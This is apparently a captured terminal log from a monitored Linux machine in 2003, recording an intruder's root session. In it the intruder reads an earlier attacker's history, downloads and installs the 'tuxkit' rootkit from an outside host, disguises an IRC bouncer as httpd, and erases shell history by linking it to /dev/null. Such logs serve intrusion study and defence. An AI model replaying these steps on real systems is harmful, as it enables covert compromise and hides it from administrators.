Tue Feb 25 11:10:10 HKT 2003
================================

Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
sudo -u root /bin/sh
Password:
sh-2.04# ls -al
total 32
drwx------   2 mssql    504          4096 Feb 24 11:56 .
drwxr-xr-x  12 root     root         4096 Feb 24 11:42 ..
-rw-------   1 root     root           17 Feb 24 11:56 .bash_history
-rw-r--r--   1 mssql    504            24 Feb 22 04:57 .bash_logout
-rw-r--r--   1 mssql    504           224 Feb 22 04:57 .bash_profile
-rw-r--r--   1 mssql    504           124 Feb 22 04:57 .bashrc
-rw-r--r--   1 mssql    504           747 Feb 22 04:57 .emacs
-rw-r--r--   1 mssql    504          3728 Feb 22 04:57 .screenrc
sh-2.04# w
 11:10am  up 3 days, 20:49,  1 user,  load average: 0.29, 0.06, 0.02
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
mssql    pts/2    astound-64-85-22 11:10am  0.00s  0.04s  0.02s  -bash 
sh-2.04# pwd
/home/mssql
sh-2.04# ls -al
total 32
drwx------   2 mssql    504          4096 Feb 24 11:56 .
drwxr-xr-x  12 root     root         4096 Feb 24 11:42 ..
-rw-------   1 root     root           17 Feb 24 11:56 .bash_history
-rw-r--r--   1 mssql    504            24 Feb 22 04:57 .bash_logout
-rw-r--r--   1 mssql    504           224 Feb 22 04:57 .bash_profile
-rw-r--r--   1 mssql    504           124 Feb 22 04:57 .bashrc
-rw-r--r--   1 mssql    504           747 Feb 22 04:57 .emacs
-rw-r--r--   1 mssql    504          3728 Feb 22 04:57 .screenrc
sh-2.04# cd
sh-2.04# su
c]0;root@pc88: /home/mssql[root@pc88 mssql]# cd
]0;root@pc88: /root[root@pc88 /root]# ls -al
total 212
drwxr-x---   5 root     root         4096 Feb 24 12:31 .
drwxr-xr-x  19 root     root         4096 Feb 22 22:38 ..
-rw-r--r--   1 root     root         1126 Aug 24  1995 .Xresources
-rw-r--r--   1 root     root            0 Feb 12 20:14 .addressbook
-rw-------   1 root     root         2285 Feb 12 20:14 .addressbook.lu
-rw-------   1 root     root          345 Feb 25 03:59 .bash_history
-rw-r--r--   1 root     root           24 Jun 11  2000 .bash_logout
-rw-r--r--   1 root     root          312 Feb 24 11:52 .bash_profile
-rw-r--r--   1 root     root          176 Aug 24  1995 .bashrc
-rw-r--r--   1 root     root          210 Jun 11  2000 .cshrc
-rw-------   1 root     root          377 Feb 12 20:25 .pine-interrupted-mail
-rw-------   1 root     root        14532 Feb 12 20:11 .pinerc
drwxr-xr-x   2 root     root         4096 Dec  4 01:02 .ssh
-rw-r--r--   1 root     root          215 Oct 24 18:06 .tcshrc
-rw-------   1 root     root       135168 Feb 23 01:30 core
drwxr-xr-x   2 root     root         4096 Dec 11 12:20 log
drwx------   2 root     root         4096 Feb 12 20:11 mail
-rw-r--r--   1 root     root            5 Feb 14 09:30 x.pid
]0;root@pc88: /root[root@pc88 /root]# cat .bash_history
mail
exit
w
cd /usr/bin/.tux/tools
./socklist
ls
cd utils
wget www.[--delete--].us/socklist.tgz
tar xzvf socklist.tgz 
./socklist 
killall -9 -vq ntpd
killall -9 -vq identd smbd atd 
./socklist 
kill -9 1187
./socklist 
wget www.[--delete--].us/psycompiled.tgz
tar xzvf psycompiled.tgz
cd psybnc
pico psybnc.conf
mv ./psybnc httpd
export PATH="."
httpd
]0;root@pc88: /root[root@pc88 /root]# ls -al
total 212
drwxr-x---   5 root     root         4096 Feb 24 12:31 .
drwxr-xr-x  19 root     root         4096 Feb 22 22:38 ..
-rw-r--r--   1 root     root         1126 Aug 24  1995 .Xresources
-rw-r--r--   1 root     root            0 Feb 12 20:14 .addressbook
-rw-------   1 root     root         2285 Feb 12 20:14 .addressbook.lu
-rw-------   1 root     root          345 Feb 25 03:59 .bash_history
-rw-r--r--   1 root     root           24 Jun 11  2000 .bash_logout
-rw-r--r--   1 root     root          312 Feb 24 11:52 .bash_profile
-rw-r--r--   1 root     root          176 Aug 24  1995 .bashrc
-rw-r--r--   1 root     root          210 Jun 11  2000 .cshrc
-rw-------   1 root     root          377 Feb 12 20:25 .pine-interrupted-mail
-rw-------   1 root     root        14532 Feb 12 20:11 .pinerc
drwxr-xr-x   2 root     root         4096 Dec  4 01:02 .ssh
-rw-r--r--   1 root     root          215 Oct 24 18:06 .tcshrc
-rw-------   1 root     root       135168 Feb 23 01:30 core
drwxr-xr-x   2 root     root         4096 Dec 11 12:20 log
drwx------   2 root     root         4096 Feb 12 20:11 mail
-rw-r--r--   1 root     root            5 Feb 14 09:30 x.pid
]0;root@pc88: /root[root@pc88 /root]# 
]0;root@pc88: /root[root@pc88 /root]# touch IS_THIS_A_HONEYNET_?
]0;root@pc88: /root[root@pc88 /root]# ls -al
total 212
drwxr-x---   5 root     root         4096 Feb 25 11:11 .
drwxr-xr-x  19 root     root         4096 Feb 22 22:38 ..
-rw-r--r--   1 root     root         1126 Aug 24  1995 .Xresources
-rw-r--r--   1 root     root            0 Feb 12 20:14 .addressbook
-rw-------   1 root     root         2285 Feb 12 20:14 .addressbook.lu
-rw-------   1 root     root          345 Feb 25 03:59 .bash_history
-rw-r--r--   1 root     root           24 Jun 11  2000 .bash_logout
-rw-r--r--   1 root     root          312 Feb 24 11:52 .bash_profile
-rw-r--r--   1 root     root          176 Aug 24  1995 .bashrc
-rw-r--r--   1 root     root          210 Jun 11  2000 .cshrc
-rw-------   1 root     root          377 Feb 12 20:25 .pine-interrupted-mail
-rw-------   1 root     root        14532 Feb 12 20:11 .pinerc
drwxr-xr-x   2 root     root         4096 Dec  4 01:02 .ssh
-rw-r--r--   1 root     root          215 Oct 24 18:06 .tcshrc
-rw-r--r--   1 root     root            0 Feb 25 11:11 IS_THIS_A_HONEYNET_?
-rw-------   1 root     root       135168 Feb 23 01:30 core
drwxr-xr-x   2 root     root         4096 Dec 11 12:20 log
drwx------   2 root     root         4096 Feb 12 20:11 mail
-rw-r--r--   1 root     root            5 Feb 14 09:30 x.pid
]0;root@pc88: /root[root@pc88 /root]# netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 192.168.20.1:22         192.168.20.254:36159    ESTABLISHED 
tcp        0      0 192.168.20.1:12241      200.75.194.145:1792     ESTABLISHED 
tcp        0      0 192.168.20.1:3983       192.168.20.254:2811     ESTABLISHED 
tcp        0      0 192.168.20.1:3984       192.168.20.254:2812     ESTABLISHED 
tcp        0    142 192.168.20.1:23         64.85.226.218:2613      ESTABLISHED 
tcp        0      0 192.168.20.1:22         192.168.20.254:36160    ESTABLISHED 
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:6011            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:6010            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:12241           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:1607            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:1030            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:995             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      
udp        0      0 0.0.0.0:767             0.0.0.0:*                           
udp        0      0 0.0.0.0:3049            0.0.0.0:*                           
udp        0      0 0.0.0.0:69              0.0.0.0:*                           
udp        0      0 0.0.0.0:514             0.0.0.0:*                           
udp        0      0 0.0.0.0:1024            0.0.0.0:*                           
Active UNIX domain sockets (including servers)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ]         STREAM     CONNECTED     359    
unix  2      [ ]         DGRAM                    900    
unix  2      [ ]         DGRAM                    1042   
unix  2      [ ]         DGRAM                    1088   
unix  2      [ ]         DGRAM                    1278   
unix  2      [ ]         DGRAM                    1328   
unix  2      [ ]         DGRAM                    10916806 
unix  2      [ ]         DGRAM                    10936342 
unix  2      [ ]         DGRAM                    10938093 
unix  2      [ ]         DGRAM                    10938101 
unix  3      [ ]         STREAM     CONNECTED     10938110 
unix  3      [ ]         STREAM     CONNECTED     10938111 
unix  3      [ ]         STREAM     CONNECTED     10938112 
unix  3      [ ]         STREAM     CONNECTED     10938113 
unix  3      [ ]         STREAM     CONNECTED     10938162 
unix  32     [ ]         STREAM     CONNECTED     10938163 /dev/usb/core/
unix  2      [ ]         DGRAM                    10939601 
unix  3      [ ]         STREAM     CONNECTED     10939654 
unix  3      [ ]         STREAM     CONNECTED     10939655 
unix  3      [ ]         STREAM     CONNECTED     10939656 
unix  3      [ ]         STREAM     CONNECTED     10939657 
unix  3      [ ]         STREAM     CONNECTED     10939705 
unix  31     [ ]         STREAM     CONNECTED     10939706 /dev/usb/core/
unix  2      [ ACC ]     STREAM     LISTENING     1305   /dev/gpmctl
unix  7      [ ]         DGRAM                    10916778 /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     10939597 /dev/usb/core/
unix  2      [ ACC ]     STREAM     LISTENING     10938098 /dev/usb/core/
]0;root@pc88: /root[root@pc88 /root]# w
 11:13am  up 3 days, 20:52,  1 user,  load average: 1.89, 0.97, 0.38
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
mssql    pts/2    astound-64-85-22 11:10am  0.00s  0.05s  0.03s  -bash 
]0;root@pc88: /root[root@pc88 /root]# ps -aux
USER       PID %CPU %MEM  SIZE   RSS TTY STAT START   TIME COMMAND
apache   12049  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12050  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12051  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12052  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12053  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12054  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12055  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12056  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12057  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12058  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12059  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12060  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12061  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12388  0.0  0.4  1368   308  ?  T   09:26   0:00 mv a mysql 
apache   12389  0.0  0.0     0     0  ?  Z   09:26   0:00 [mv ]
apache   12395  0.0  1.7  2304  1116  ?  S   09:26   0:00 ./mysql 
apache   31441  0.0  8.2 12864  5128  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31442  0.0  8.2 12864  5152  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31443  0.0  8.2 12864  5152  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31444  0.0  8.2 12864  5140  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31445  0.0  8.2 12864  5108  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31446  0.0  8.1 12844  5044  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31447  0.0  8.2 12864  5156  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
mssql    13051  0.0  1.8  2164  1160  p1 S   11:10   0:00 /bin/bash 
root         1  0.0  0.1  1368    72  ?  S  Feb 21   0:05 init [3]  
root         2  0.0  0.0     0     0  ?  SW Feb 21   0:00 [keventd]
root         3  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kapm-idled]
root         5  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kreclaimd]
root         6  0.0  0.0     0     0  ?  SW Feb 21   0:00 [bdflush]
root         7  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kupdated]
root         8  0.0  0.0     0     0  ?  SW]
root     10354  0.0  1.9  2464  1224  ?  S   03:59   0:00 httpd 
root     10367  0.0  0.9  1568   596  ?  S   04:02   0:00 CROND 
root     10368  0.0  1.4  1924   912  ?  S   04:02   0:00 /bin/bash /usr/bin/ru
root     10371  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10373  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10378  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10380  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10387  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10389  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10390  0.0  3.3  5204  2080  ?  S   04:02   0:00 /usr/sbin/sendmail -F
root     10391  0.0  1.3  1904   868  ?  S   04:02   0:00 /bin/bash /etc/cron.d
root     10392  0.0  0.8  1656   556  ?  S   04:02   0:00 awk -v progname=/etc/
root     10394  0.0  0.4  1348   304  ?  T   04:02   0:00 touch /var/lock/makew
root     10395  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10396  0.0  1.4  1924   904  ?  S   04:02   0:00 /bin/sh /usr/sbin/mak
root     10397  0.0  0.0     0     0  ?  Z   04:02   0:00 [touch ]
root     10398  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10404  0.0  0.4  1328   300  ?  T   04:02   0:00 mktemp /var/tmp/tmpwh
root     10405  0.0  0.0     0     0  ?  Z   04:02   0:00 [mktemp ]
root     12999  0.0  1.0  1444   676  ?  S   11:02   0:00 syslogd -m 0 
root     13011  0.0  1.7  1920  1088  ?  S   11:02   0:00 klogd -2 
root     13045  0.0  1.3  1720   836  ?  S   11:10   0:00 in.telnetd: astound-6
root     13047  0.0  2.1  2412  1312  ?  S   11:10   0:00 login -- mssql      
root     13050  0.0  0.8  1540   524  ?  S   11:10   0:00 -bash 
root     13052  0.0  2.4  3320  1544  ?  S   11:10   0:00 /bin/data_mining 
root     13076 54.8  0.6  1520   400  ?  R   11:10   1:59 /bin/mingetty ttyp1 
root     13077  0.0  1.0  1972   672  ?  S   11:10   0:00 /bin/number_cum -w 1
root     13081  0.0  1.8  2160  1160  p1 S   11:10   0:00 /bin/sh 
root     13090  0.0  1.4  2072   932  p1 S   11:10   0:00 su 
root     13092  0.0  2.3  2840  1480  p1 S   11:10   0:00 -csh 
root     13109  0.0  0.8  1540   524  p1 S   11:10   0:00 /sbin/bash 
root     13110  0.0  2.1  2388  1332  p2 S   11:10   0:00 /bin/bash 
root     13143  0.0  2.5  3320  1564  ?  S   11:10   0:00 /bin/data_mining 
root     13167 50.1  0.6  1520   400  ?  R   11:10   1:37 /bin/mingetty ttyp2 
root     13168  0.0  1.0  1972   672  ?  S   11:10   0:00 /bin/number_cum -w 1
root     13196  0.0  1.1  1472   696  p2 R   11:13   0:00 ps -aux 
root     13197  0.0  0.4  1364   308  p2 R   11:13   0:00 ps -aux 
root     13198  0.0  0.4  1364   308  p2 R   11:13   0:00 ps -aux 
root     13199  0.0  0.5  1420   316  p2 R   11:13   0:00 /sbin/modprobe -s -k
root     13200  0.0  0.5  1420   316  p2 R   11:13   0:00 /sbin/modprobe -s -k
rpcuser    591  0.0  0.4  1568   264  ?  S  Feb 21   0:00 rpc.statd 
]0;root@pc88: /root[root@pc88 /root]# ping yahoo.com
PING yahoo.com (64.58.79.230) from 192.168.20.1 : 56(84) bytes of data.
64 bytes from w1.rc.vip.dcx.yahoo.com (64.58.79.230): icmp_seq=0 ttl=237 time=294.240 msec
64 bytes from w1.rc.vip.dcx.yahoo.com (64.58.79.230): icmp_seq=1 ttl=237 time=298.471 msec

--- yahoo.com ping statistics ---
3 packets transmitted, 2 packets received, 33% packet loss
round-trip min/avg/max/mdev = 294.240/296.355/298.471/2.184 ms
]0;root@pc88: /root[root@pc88 /root]# 208.235.198.251
bash: 208.235.198.251: command not found
]0;root@pc88: /root[root@pc88 /root]# wget 192.[--delete--].170/~bb02/images/gif/tuxkit.tgz
--11:14:17--  http://192.[--delete--].170/%7Ebb02/images/gif/tuxkit.tgz
           => `tuxkit.tgz'
Connecting to 192.[--delete--].170:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 2,624,445 [application/x-tar]

    0K -> .......... .......... .......... .......... .......... [  1%]
   50K -> .......... .......... .......... .......... .......... [  3%]
  100K -> .......... .......... .......... .......... .......... [  5%]
  150K -> .......... .......... .......... .......... .......... [  7%]
  200K -> .......... .......... .......... .......... .......... [  9%]
  250K -> .......... .......... .......... .......... .......... [ 11%]
  300K -> .......... .......... .......... .......... .......... [ 13%]
  350K -> .......... .......... .......... .......... .......... [ 15%]
  400K -> .......... .......... .......... .......... .......... [ 17%]
  450K -> .......... .......... .......... .......... .......... [ 19%]
  500K -> .......... .......... .......... .......... .......... [ 21%]
  550K -> .......... .......... .......... .......... .......... [ 23%]
  600K -> .......... .......... .......... .......... .......... [ 25%]
  650K -> .......... .......... .......... .......... .......... [ 27%]
  700K -> .......... .......... .......... .......... .......... [ 29%]
  750K -> .......... .......... .......... .......... .......... [ 31%]
  800K -> .......... .......... .......... .......... .......... [ 33%]
  850K -> .......... .......... .......... .......... .......... [ 35%]
  900K -> .......... .......... .......... .......... .......... [ 37%]
  950K -> .......... .......... .......... .......... .......... [ 39%]
 1000K -> .......... .......... .......... .......... .......... [ 40%]
 1050K -> .......... .......... .......... .......... .......... [ 42%]
 1100K -> .......... .......... .......... .......... .......... [ 44%]
 1150K -> .......... .......... .......... .......... .......... [ 46%]
 1200K -> .......... .......... .......... .......... .......... [ 48%]
 1250K -> .......... .......... .......... .......... .......... [ 50%]
 1300K -> .......... .......... .......... .......... .......... [ 52%]
 1350K -> .......... .......... .......... .......... .......... [ 54%]
 1400K -> .......... .......... .......... .......... .......... [ 56%]
 1450K -> .......... .......... .......... .......... .......... [ 58%]
 1500K -> .......... .......... .......... .......... .......... [ 60%]
 1550K -> .......... .......... .......... .......... .......... [ 62%]
 1600K -> .......... .......... .......... .......... .......... [ 64%]
 1650K -> .......... .......... .......... .......... .......... [ 66%]
 1700K -> .......... .......... .......... .......... .......... [ 68%]
 1750K -> .......... .......... .......... .......... .......... [ 70%]
 1800K -> .......... .......... .......... .......... .......... [ 72%]
 1850K -> .......... .......... .......... .......... .......... [ 74%]
 1900K -> .......... .......... .......... .......... .......... [ 76%]
 1950K -> .......... .......... .......... .......... .......... [ 78%]
 2000K -> .......... .......... .......... .......... .......... [ 79%]
 2050K -> .......... .......... .......... .......... .......... [ 81%]
 2100K -> .......... .......... .......... .......... .......... [ 83%]
 2150K -> .......... .......... .......... .......... .......... [ 85%]
 2200K -> .......... .......... .......... .......... .......... [ 87%]
 2250K -> .......... .......... .......... .......... .......... [ 89%]
 2300K -> .......... .......... .......... .......... .......... [ 91%]
 2350K -> .......... .......... .......... .......... .......... [ 93%]
 2400K -> .......... .......... .......... .......... .......... [ 95%]
 2450K -> .......... .......... .......... .......... .......... [ 97%]
 2500K -> .......... .......... .......... .......... .......... [ 99%]
 2550K -> .......... ..                                          [100%]

11:15:06 (52.57 KB/s) - `tuxkit.tgz' saved [2624445/2624445]

]0;root@pc88: /root[root@pc88 /root]# tar -zxvf tux*
tuxkit/
tuxkit/bin.tgz
tuxkit/cfg.tgz
tuxkit/lib.tgz
tuxkit/sshd.tgz
tuxkit/tools.tgz
tuxkit/tuxkit
]0;root@pc88: /root[root@pc88 /root]# ls -al
total 2784
drwxr-x---   6 root     root         4096 Feb 25 11:15 .
drwxr-xr-x  19 root     root         4096 Feb 22 22:38 ..
-rw-r--r--   1 root     root         1126 Aug 24  1995 .Xresources
-rw-r--r--   1 root     root            0 Feb 12 20:14 .addressbook
-rw-------   1 root     root         2285 Feb 12 20:14 .addressbook.lu
-rw-------   1 root     root          345 Feb 25 03:59 .bash_history
-rw-r--r--   1 root     root           24 Jun 11  2000 .bash_logout
-rw-r--r--   1 root     root          312 Feb 24 11:52 .bash_profile
-rw-r--r--   1 root     root          176 Aug 24  1995 .bashrc
-rw-r--r--   1 root     root          210 Jun 11  2000 .cshrc
-rw-------   1 root     root          377 Feb 12 20:25 .pine-interrupted-mail
-rw-------   1 root     root        14532 Feb 12 20:11 .pinerc
drwxr-xr-x   2 root     root         4096 Dec  4 01:02 .ssh
-rw-r--r--   1 root     root          215 Oct 24 18:06 .tcshrc
-rw-r--r--   1 root     root            0 Feb 25 11:11 IS_THIS_A_HONEYNET_?
-rw-------   1 root     root       135168 Feb 23 01:30 core
drwxr-xr-x   2 root     root         4096 Dec 11 12:20 log
drwx------   2 root     root         4096 Feb 12 20:11 mail
drwxr-xr-x   2 933      cheerie      4096 Feb 25 10:17 tuxkit
-rw-r--r--   1 root     root      2624445 Feb 25 10:05 tuxkit.tgz
-rw-r--r--   1 root     root            5 Feb 14 09:30 x.pid
]0;root@pc88: /root[root@pc88 /root]# rm -rf .bash_history ; ln -s /dev/null .bash_history
]0;root@pc88: /root[root@pc88 /root]# ls =-al
ls: =-al: No such file or directory
]0;root@pc88: /root[root@pc88 /root]# ls -al
total 2780
drwxr-x---   6 root     root         4096 Feb 25 11:15 .
drwxr-xr-x  19 root     root         4096 Feb 22 22:38 ..
-rw-r--r--   1 root     root         1126 Aug 24  1995 .Xresources
-rw-r--r--   1 root     root            0 Feb 12 20:14 .addressbook
-rw-------   1 root     root         2285 Feb 12 20:14 .addressbook.lu
lrwxrwxrwx   1 root     root            9 Feb 25 11:15 .bash_history -> /dev/null
-rw-r--r--   1 root     root           24 Jun 11  2000 .bash_logout
-rw-r--r--   1 root     root          312 Feb 24 11:52 .bash_profile
-rw-r--r--   1 root     root          176 Aug 24  1995 .bashrc
-rw-r--r--   1 root     root          210 Jun 11  2000 .cshrc
-rw-------   1 root     root          377 Feb 12 20:25 .pine-interrupted-mail
-rw-------   1 root     root        14532 Feb 12 20:11 .pinerc
drwxr-xr-x   2 root     root         4096 Dec  4 01:02 .ssh
-rw-r--r--   1 root     root          215 Oct 24 18:06 .tcshrc
-rw-r--r--   1 root     root            0 Feb 25 11:11 IS_THIS_A_HONEYNET_?
-rw-------   1 root     root       135168 Feb 23 01:30 core
drwxr-xr-x   2 root     root         4096 Dec 11 12:20 log
drwx------   2 root     root         4096 Feb 12 20:11 mail
drwxr-xr-x   2 933      cheerie      4096 Feb 25 10:17 tuxkit
-rw-r--r--   1 root     root      2624445 Feb 25 10:05 tuxkit.tgz
-rw-r--r--   1 root     root            5 Feb 14 09:30 x.pid
]0;root@pc88: /root[root@pc88 /root]# cat *pid
1218
]0;root@pc88: /root[root@pc88 /root]# rm -rf *z
]0;root@pc88: /root[root@pc88 /root]# cd tux*
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ./setup kewlako 3432 8008
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ./setup k3wlm3 3432 8008
bash: ./setup: No such file or directory
]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ./tuxkit k3wlm3 3432 8008




]0;root@pc88: /root/tuxkit[root@pc88 tuxkit]# ps -aux
USER       PID %CPU %MEM  SIZE   RSS TTY STAT START   TIME COMMAND
apache   12049  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12050  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12051  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12052  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12053  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12054  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12055  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12056  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12057  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12058  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12059  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12060  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12061  0.0  9.1 12844  5684  ?  S   09:12   0:00 /usr/sbin/httpd -DHAV
apache   12388  0.0  0.4  1368   308  ?  T   09:26   0:00 mv a mysql 
apache   12389  0.0  0.0     0     0  ?  Z   09:26   0:00 [mv ]
apache   12395  0.0  1.7  2304  1116  ?  S   09:26   0:00 ./mysql 
apache   31441  0.0  8.2 12864  5128  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31442  0.0  8.2 12864  5152  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31443  0.0  8.2 12864  5152  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31444  0.0  8.2 12864  5140  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31445  0.0  8.2 12864  5108  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31446  0.0  8.1 12844  5044  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
apache   31447  0.0  8.2 12864  5156  ?  S  Feb 22   0:00 /usr/sbin/httpd -DHAV
mssql    13051  0.0  1.8  2164  1160  p1 S   11:10   0:00 /bin/bash 
root         1  0.0  0.1  1368    72  ?  S  Feb 21   0:05 init [3]  
root         2  0.0  0.0     0     0  ?  SW Feb 21   0:00 [keventd]
root         3  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kapm-idled]
root         5  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kreclaimd]
root         6  0.0  0.0     0     0  ?  SW Feb 21   0:00 [bdflush]
root         7  0.0  0.0     0     0  ?  SW Feb 21   0:00 [kupdated]
root         8  0.0  0.0     0     0  ?  SW]
root     10354  0.0  1.9  2464  1224  ?  S   04:00   0:00 httpd 
root     10367  0.0  0.9  1568   596  ?  S   04:02   0:00 CROND 
root     10368  0.0  1.4  1924   912  ?  S   04:02   0:00 /bin/bash /usr/bin/ru
root     10371  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10373  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10378  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10380  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10387  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10389  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10390  0.0  3.3  5204  2080  ?  S   04:02   0:00 /usr/sbin/sendmail -F
root     10391  0.0  1.3  1904   868  ?  S   04:02   0:00 /bin/bash /etc/cron.d
root     10392  0.0  0.8  1656   556  ?  S   04:02   0:00 awk -v progname=/etc/
root     10394  0.0  0.4  1348   304  ?  T   04:02   0:00 touch /var/lock/makew
root     10395  0.0  0.5  1644   344  ?  T   04:02   0:00 awk -v progname=/etc/
root     10396  0.0  1.4  1924   904  ?  S   04:02   0:00 /bin/sh /usr/sbin/mak
root     10397  0.0  0.0     0     0  ?  Z   04:02   0:00 [touch ]
root     10398  0.0  0.0     0     0  ?  Z   04:02   0:00 [awk ]
root     10404  0.0  0.4  1328   300  ?  T   04:02   0:00 mktemp /var/tmp/tmpwh
root     10405  0.0  0.0     0     0  ?  Z   04:02   0:00 [mktemp ]
root     12999  0.0  1.0  1444   676  ?  S   11:02   0:00 syslogd -m 0 
root     13011  0.0  1.7  1920  1088  ?  S   11:02   0:00 klogd -2 
root     13045  0.0  1.3  1720   836  ?  S   11:10   0:00 in.telnetd: astound-6
root     13047  0.0  2.1  2412  1312  ?  S   11:10   0:00 login -- mssql      
root     13050  0.0  0.8  1540   524  ?  S   11:10   0:00 -bash 
root     13052  0.0  2.4  3320  1544  ?  S   11:10   0:00 /bin/data_mining 
root     13076 51.6  0.6  1520   400  ?  R   11:10   5:05 /bin/mingetty ttyp1 
root     13077  0.0  1.0  1972   672  ?  S   11:10   0:00 /bin/number_cum -w 1
root     13081  0.0  1.8  2160  1160  p1 S   11:10   0:00 /bin/sh 
root     13090  0.0  1.4  2072   932  p1 S   11:10   0:00 su 
root     13092  0.0  2.3  2840  1480  p1 S   11:10   0:00 -csh 
root     13109  0.0  0.8  1540   524  p1 S   11:10   0:00 /sbin/bash 
root     13110  0.0  2.1  2388  1332  p2 S   11:10   0:00 /bin/bash 
root     13143  0.0  2.5  3320  1564  ?  S   11:10   0:00 /bin/data_mining 
root     13167 49.9  0.6  1520   400  ?  R   11:10   4:43 /bin/mingetty ttyp2 
root     13168  0.0  1.0  1972   672  ?  S   11:10   0:00 /bin/number_cum -w 1
root     13198  0.0  0.4  1364   308  p2 S   11:13   0:00 ps -aux 
